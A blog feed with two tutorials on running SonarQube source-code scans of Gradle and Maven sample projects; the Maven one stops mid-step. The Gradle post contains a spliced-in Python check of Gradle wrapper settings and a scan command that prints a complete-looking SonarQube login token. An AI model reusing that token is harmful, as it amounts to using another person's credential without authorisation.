雅技資訊日誌 | Author: 雅技資訊技術 (http://www.blogger.com/profile/06948808120337987647) | Feed updated 2024-03-14T04:46:03.553+08:00
Scanning Gradle Project Source Code with SonarQube | Published 2023-10-02T15:43:00.002+08:00, updated 2023-10-02T15:43:44.494+08:00
<div style="border: 3px solid rgb(208, 250, 88); line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
<a href="https://www.sonarsource.com/products/sonarqube/downloads/" target="_blank">SonarQube</a>
<span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #333333; font-size: 14.85px; text-indent: 29.7px;">is a white-box scanning tool. This example uses the free, open-source Community edition.</span><span style="color: #333333;"> For installation instructions, see the article “<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" style="color: #992211;" target="_blank">Building Black-Box and White-Box Scanning Systems on KALI Linux (Arachni and SonarQube)</a>”.</span></p>
<p style="margin-bottom: 8px; text-indent: 2em;">This article uses the example provided by SonarQube, “<a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank"> </a><span style="color: #bf9000;"><u>sonar-scanning-examples-master\sonarqube-scanner-gradle\<span style="background-color: #fcff01;">gradle-multimodule</span></u></span>”, for the demonstration; it is placed in the directory “C:\sonar-scanning-examples-master\sonarqube-scanner-gradle\gradle-multimodule”. To scan a different gradle project, adjust the steps to that project's environment and structure, especially the tool and Java versions.</p>
<p style="margin-bottom: 2px;"><b>I. Prerequisites</b></p>
<p style="margin: 0px 2px 2px 2em;">(1) A JDK suitable for the project to be scanned</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">1. This example uses Java 13, which I placed in C:\JAVA\jdk-13.0.2.</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">2. Create the environment variable “JAVA_HOME” and point it to “C:\JAVA\jdk-13.0.2”.</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">3. Add “%JAVA_HOME%\bin” to the <span style="color: red;">PATH</span> environment variable so that the operating system can find javac.exe.</p>
<p style="margin: 0px 2px 2px 2em;">(2) The gradle tool (used to create the Gradle Wrapper)</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">1. Download the Gradle distribution from the <a href="https://gradle.org/releases/" target="_blank">Gradle website</a> and extract it directly to a directory of your choice, for example “C:\gradle\gradle-8.0.2”.</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">2. Create the environment variable “GRADLE_HOME” and point it to “C:\gradle\gradle-8.0.2”.</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">3. Add “%GRADLE_HOME%\bin” to the <span style="color: red;">PATH</span> environment variable so that the operating system can find gradle.exe.</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">4. Run gradle -v to confirm that gradle.exe can be executed.</p>
<div style="background-color: black; line-height: 100%; margin: 2px 2px 1em 0px; padding: 4px;"><pre><span style="color: white;">C:\></span><span style="color: #e69138;">gradle -v</span><span style="color: white;">
------------------------------------------------------------
Gradle 8.0.2
------------------------------------------------------------
Build time: 2023-03-03 16:41:37 UTC
Revision: 7d6581558e226a580d91d399f7dfb9e3095c2b1d
Kotlin: 1.8.10
Groovy: 3.0.13
Ant: Apache Ant(TM) version 1.10.11 compiled on July 10 2021
JVM: 17.0.2 (Oracle Corporation 17.0.2+8-86)
OS: Windows 10 10.0 amd64
C:\></span></pre>
</div>
<p style="margin-bottom: 2px; margin-top: 0px;"><span style="color: #134f5c;"><b>II. Modify the build.gradle of the project to be scanned and add the sonar scanner plugin:</b></span></p>
<p style="margin: 0px 2px 2px 2em;">This example uses version 4.3.1.3277 of the plugin. The <a href="https://plugins.gradle.org/plugin/org.sonarqube" target="_blank">versions of the sonar scanner plugin available for gradle</a> are listed here; choose a suitable one.</p>
<div style="background-color: black; margin: 2px 2px 2px 0px; padding: 4px;"><pre><span style="color: white;">plugins {
// ... other plugins ...
</span><span style="color: #04ff00;">// Add the plugin version appropriate for SonarQube; see the version that Sonar suggests after you create the Sonar scan project</span><span style="color: white;">
</span><span style="color: #fcff01;">id 'org.sonarqube' version '4.3.1.3277'</span><span style="color: white;">
}</span></pre>
</div>
<p style="margin-bottom: 2px;"><b><span style="color: #134f5c;">III. Run the scan:</span></b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(1) Start the SonarQube Scanner Server, assumed here to be at “ <span style="color: #cc0000;">http://192.168.232.153:9000</span>”.</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(2) Connect to the SonarQube Scanner Server with a browser and create a scan project (if you are rescanning an existing project, have its Project Token ready).</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. On the Projects page, select “Create Project” -> “Manually”.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2. In the Community edition, “Locally” is the only option that can be selected.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3. Fill in the “Project display name” and the “Project key”.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4. Generate the Project Token (the project's identity code).</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5. Make a note of the Project Token.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/s846/sonar_net_core_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="846" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/w400-h266/sonar_net_core_007.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6. Select the type of project to be scanned (Gradle).</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMb393hmPQJuXxcT0wqk8Q6i4m3iKXqodDEH3dtZoiuVvxJVElqXTuSA9vy2g8IxAO92pftbrUPVrIwPsSzYu_6F_hDRDzYMUBVWXGImaFzwEHm_CayPvJ1jmvM6eafNcSrPHmNZPQ-WYqidHjR_rOS0PzMtC8-_tlyas22vQS9jaP_AlnwiQk2NUQAi6u/s1577/gradle-01.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1577" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMb393hmPQJuXxcT0wqk8Q6i4m3iKXqodDEH3dtZoiuVvxJVElqXTuSA9vy2g8IxAO92pftbrUPVrIwPsSzYu_6F_hDRDzYMUBVWXGImaFzwEHm_CayPvJ1jmvM6eafNcSrPHmNZPQ-WYqidHjR_rOS0PzMtC8-_tlyas22vQS9jaP_AlnwiQk2NUQAi6u/w400-h175/gradle-01.PNG" width="400" /></a></div><br />
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(3) Open a Command Prompt and change the working directory to the Gradle project to be scanned; in this example it is C:\sonar-scanning-examples-master\sonarqube-scanner-gradle\gradle-multimodule, and the example already ships with a “gradle wrapper”.<br />If your project directory does <b>not</b> contain a “<span style="color: red;">gradle\wrapper</span>” directory, <span style="text-indent: -2em;">run “</span><span style="color: #e69138; text-indent: -2em;">gradle wrapper</span><span style="text-indent: -2em;">” in the project directory. When it finishes, two directories (.gradle and gradle) and two files (gradlew and gradlew.bat) are added to the directory.<br />If the project to be scanned <b>already has</b> the .gradle and gradle directories and the gradlew and gradlew.bat files, skip this step.</span></p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(4) Check the gradle version specified by the <b><span style="color: red;">distributionUrl</span></b> entry of the <span style="color: red;">gradle-wrapper.properties</span> file in the gradle\wrapper\ directory (all versions are listed at <a href="https://services.gradle.org/distributions/" target="_blank">https://services.gradle.org/distributions/</a>), and the JDK version in use.<br />If the gradle service version or the JDK version does not match the project to be scanned, errors occur during the build.</p>
<div style="background-color: black; color: white; line-height: 100%; margin: 2px 2px 1em 0px; padding: 4px;"><pre><span style="color: #04ff00;">#Tue May 19 06:55:41 BST 2020</span>
distributionUrl=https\://services.gradle.org/distributions/gradle-<span style="background-color: red;">6.4.1</span>-all.zip
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStorePath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
</pre></div>
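<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(5) If the requirements of sections I and II are met, you can directly copy and run the command that SonarQube provides.<br />Because that command is in Linux format and this example runs on Windows, the command must be adjusted by rewriting the original command as a single line.</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(6) The execution proceeds as shown below (<span style="color: #e69138;"><b>the parts in orange are the commands I ran</b></span>).</p>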
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;"><span style="color: white;">C:\sonar-scanning-examples-master\sonarqube-scanner-gradle\gradle-multimodule></span><span style="color: #e69138;">gradlew.bat sonar -Dsonar.projectKey=Example-Gradle-Project -Dsonar.host.url=http://192.168.232.153:9000 -Dsonar.login=sqp_99a6eebeda445bce288e94afae9aa409e7454d75</span><br /><span style="color: white;">> Task :sonar</span><br /><span style="color: white;">SCM provider autodetection failed. Please use "sonar.scm.provider" to define SCM of your project, or disable the SCM Sensor in the project settings.</span><br /><span style="color: #04ff00;">BUILD SUCCESSFUL</span><span style="color: white;"> in 39s</span><br /><span style="color: white;">2 actionable tasks: 2 executed</span><br /><span style="color: white;"><-------------> 0% WAITING</span><br /><span style="color: white;">> IDLE </span></div>
<p style="margin-bottom: 8px; text-indent: 2em;">If the preceding steps are correct, the scan should complete and you will see “BUILD SUCCESSFUL” at the end. If an error occurs, read the messages carefully and use Google or ChatGPT to find the answer.</p>
<p style="margin-bottom: 8px; text-indent: 2em;">After the scan completes, the project results can be viewed in the SonarQube Scanner Web UI.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdcWGXBL6deMSo-lk67YG9XwZr8CdI5bpt298g1EwdhhVhDEEjlmFG6bLYcUJn_4ZQTHylZbHoRKV1HMADmdKBfWRT8nFLXkoG0K3QPHDpqCvbYQ8wUPs-j5lmcYaYzss3BP44YGBqwEpInEV2zvT3mLZt8DRjaMHOkJg5MsPre_7Ta4jSVCboxiKHE0s/s1600/gradle-02.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="438" data-original-width="1600" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdcWGXBL6deMSo-lk67YG9XwZr8CdI5bpt298g1EwdhhVhDEEjlmFG6bLYcUJn_4ZQTHylZbHoRKV1HMADmdKBfWRT8nFLXkoG0K3QPHDpqCvbYQ8wUPs-j5lmcYaYzss3BP44YGBqwEpInEV2zvT3mLZt8DRjaMHOkJg5MsPre_7Ta4jSVCboxiKHE0s/w400-h110/gradle-02.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>
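<p style="margin-bottom: 8px; text-indent: 2em;">The version check described in step (4) of section III, as an added example in Python (not code from the original post or from the Gradle or SonarQube projects): it parses the gradle-wrapper.properties file shown above, extracts the Gradle version from distributionUrl, compares it with the JDK that will run the build, and also reports a non-HTTPS or unexpected download host and a missing distributionSha256Sum. The compatibility table is a subset of Gradle's published compatibility matrix, and the function names and finding codes are assumptions of this example.</p>

```python
"""Pre-flight check of gradle-wrapper.properties before running `gradlew sonar`."""
import re
from urllib.parse import urlparse

# First Gradle release able to run on each JDK major version, taken from Gradle's
# published compatibility matrix (subset; re-check it for newer JDKs).
MIN_GRADLE_FOR_JDK = {
    11: (5, 0), 12: (5, 4), 13: (6, 0), 14: (6, 3), 15: (6, 7), 16: (7, 0),
    17: (7, 3), 18: (7, 5), 19: (7, 6), 20: (8, 3), 21: (8, 5),
}
EXPECTED_HOST = "services.gradle.org"  # host of the distributionUrl shown on this page

# The wrapper file exactly as shown on this page.
PAGE_WRAPPER_PROPERTIES = r"""#Tue May 19 06:55:41 BST 2020
distributionUrl=https\://services.gradle.org/distributions/gradle-6.4.1-all.zip
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStorePath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
"""


def parse_properties(text):
    """Parse the subset of .properties syntax that the wrapper file uses."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue  # blank line or comment
        key, sep, value = line.partition("=")
        if sep:
            # The wrapper task writes "https\://"; undo the backslash escapes.
            props[key.strip()] = re.sub(r"\\(.)", r"\1", value.strip())
    return props


def gradle_version(distribution_url):
    """Return the Gradle version in a distributionUrl as a tuple, e.g. (6, 4, 1)."""
    m = re.search(r"/gradle-(\d+(?:\.\d+)*)[^/]*-(?:bin|all)\.zip$", distribution_url)
    if not m:
        raise ValueError(f"cannot read a Gradle version from {distribution_url!r}")
    version = tuple(int(part) for part in m.group(1).split("."))
    return version + (0,) * (2 - len(version))  # pad "7" to (7, 0)


def jdk_major(java_version_output):
    """Extract the major version from `java -version` output."""
    m = re.search(r'version "(\d+)(?:\.(\d+))?', java_version_output)
    if not m:
        raise ValueError("no version string found")
    major = int(m.group(1))
    # Legacy numbering: "1.8.0_292" means Java 8.
    return int(m.group(2)) if major == 1 and m.group(2) else major


def check_wrapper(properties_text, jdk):
    """Return a list of (code, message) findings; an empty list means no objections."""
    props = parse_properties(properties_text)
    url = props.get("distributionUrl")
    if not url:
        return [("NO_URL", "distributionUrl is missing")]
    findings = []
    parsed = urlparse(url)
    if parsed.scheme != "https":
        findings.append(("NOT_HTTPS", f"distribution is fetched over {parsed.scheme}"))
    if parsed.hostname != EXPECTED_HOST:
        findings.append(("UNEXPECTED_HOST", f"download host is {parsed.hostname}"))
    if "distributionSha256Sum" not in props:
        findings.append(("NO_CHECKSUM",
                         "no distributionSha256Sum, so the download is not checked "
                         "against a pinned hash"))
    try:
        version = gradle_version(url)
    except ValueError as exc:
        findings.append(("BAD_VERSION", str(exc)))
        return findings
    minimum = MIN_GRADLE_FOR_JDK.get(jdk)
    shown = ".".join(map(str, version))
    if minimum is None:
        findings.append(("JDK_UNKNOWN", f"JDK {jdk} is not in the table; check manually"))
    elif minimum > version:
        needed = ".".join(map(str, minimum))
        findings.append(("JDK_TOO_NEW",
                         f"Gradle {shown} cannot run on JDK {jdk}; needs {needed} or later"))
    return findings


if __name__ == "__main__":
    for jdk in (13, 17):
        print(f"JDK {jdk}:", check_wrapper(PAGE_WRAPPER_PROPERTIES, jdk) or "no findings")
```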
<hr style="border: 2px solid rgb(14, 230, 34);" />
<p style="margin-left: 1em;">For scanning dotNet Framework projects, see: <a href="http://以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)">Running a Source Code Scan of a .netFramework Project with SonarQube (White-Box Scanning)</a></p>
<p style="margin-left: 1em;">For scanning dotNet Core projects, see: <a href="http://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">Scanning dotNet Core Project Source Code with SonarQube (White-Box Scanning)</a></p>
</div>
Scanning maven Project Source Code with SonarQube (White-Box Scanning) | Published 2023-09-28T11:05:00.003+08:00, updated 2023-10-01T14:58:14.319+08:00
<div style="border: 3px solid rgb(208, 250, 88); line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
<a href="https://www.sonarsource.com/products/sonarqube/downloads/?gads_campaign=SQ-Mroi-PMax&gads_ad_group=Global&gads_keyword=&_gl=1*va5gvw*_up*MQ..&gclid=CjwKCAjwmbqoBhAgEiwACIjzEI66FX1-IEadA5PhZD8AlOYcaDmlO2JNog-wx0y8seU7bEGnQSX7NBoCkNAQAvD_BwE" style="background-color: white; color: #992211; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.85px; text-decoration-line: none; text-indent: 29.7px;" target="_blank">SonarQube</a>
<span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #333333; font-size: 14.85px; text-indent: 29.7px;">is a white-box scanning tool. This example uses the free, open-source Community edition.</span>
<span style="color: #333333;">For installation instructions, see “<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" style="color: #992211; text-decoration-line: none;" target="_blank">Building Black-Box and White-Box Scanning Systems on KALI Linux (Arachni and SonarQube)</a>”.</span>
</p>
<p style="margin-bottom: 8px; text-indent: 2em;">This article uses the example provided by SonarQube, “<a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank">
<span><span style="color: #bf9000;">sonar-scanning-examples-master\sonarqube-scanner-maven\</span><span style="background-color: #ffe599;"><span style="color: #990000;">maven-multilingual</span></span></span><span style="background-color: #ffe599;"><span style="color: #990000;">
</span></span>
</a> ”, for the demonstration. To scan a different maven project, adjust the steps to that project's environment and structure, especially the tool and Java versions.</p>
<p style="margin-bottom: 2px;"><b>I. Prerequisites</b></p>
<p style="margin: 0px 2px 2px 2em;">(1) maven</p>
<p style="margin: 0px 2px 2px 4em;">Download a suitable version of Maven from the <a href="https://maven.apache.org/download.cgi" target="_blank">Apache Maven Project</a> (this example uses maven-3.9.0) and <span style="text-indent: 2em;">extract it to a directory of your choice, for example “C:\maven\apache-maven-3.9.0”.</span></p><p style="margin: 0px 2px 2px 4em;">Create the environment variable “<span style="color: #cc0000;">M2_HOME</span>” and point it to “C:\maven\apache-maven-3.9.0”.</p><p style="margin: 0px 2px 2px 4em;"><span style="text-indent: 2em;">Add “%M2_HOME%\bin” to the </span><span style="color: #cc0000; text-indent: 2em;">PATH </span><span style="text-indent: 2em;">environment variable so that the operating system can find mvn.exe.</span></p>
<p style="margin: 0px 2px 2px 2em;">(2) A JDK suitable for the project to be scanned</p>
<p style="margin: 0px 2px 8px 4em;">This example uses Java 11, located at C:\JAVA\jdk-11.0.2.</p>
<p style="margin-bottom: 2px; margin-top: 0px;"><b><span style="color: #134f5c;">II. Modify the pom.xml of the project to be scanned and add the sonar scanner:</span></b></p>
<p style="margin: 0px 2px 2px 2em;">If you do not want to modify the pom.xml of the project to be scanned, see item (4) of “III. Run the scan”.</p>
<div style="background-color: black; margin: 2px 2px 2px 0px; padding: 4px;"><pre><span style="color: white;"><build><br /> <pluginManagement><br /> <plugins><br /> <plugin><br /> <groupId>org.apache.maven.plugins</groupId><br /> <artifactId>maven-compiler-plugin</artifactId><br /> <version>3.8.1</version><br /> </plugin><br /></span><span style="color: #04ff00;"><!-- The following is added for SonarQube --></span><span style="color: white;"><br /></span><span style="color: #fff2cc;"> <plugin><br /> <groupId>org.sonarsource.scanner.maven</groupId><br /> <artifactId>sonar-maven-plugin</artifactId><br /> <version>3.9.1.2184</version><br /> </plugin></span><span style="color: white;"><br /> </plugins><br /> </pluginManagement><br /></build><br /></span></pre>
</div>
<p style="margin: 0px 2px 8px 2em;">The <a href="https://mvnrepository.com/artifact/org.sonarsource.scanner.maven/sonar-maven-plugin" target="_blank">available versions of the sonar scanner plugin</a> are listed here; choose a suitable one. This example uses 3.9.1.2184.</p>
<p style="margin-bottom: 2px;"><b><span style="color: #134f5c;">III. Run the scan:</span></b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(1) Start the SonarQube Scanner Server, assumed here to be at “ <span style="color: #cc0000;">http://192.168.232.153:9000</span>”.</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(2) Connect to the SonarQube Scanner Server with a browser and create a scan project (if you are rescanning an existing project, have its Project Token ready).</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. On the Projects page, select “Create Project” -> “Manually”.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2. In the Community edition, “Locally” is the only option that can be selected.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3. Fill in the “Project display name” and the “Project key”.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4. Generate the Project Token (the project's identity code).</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5. Make a note of the Project Token.</p>
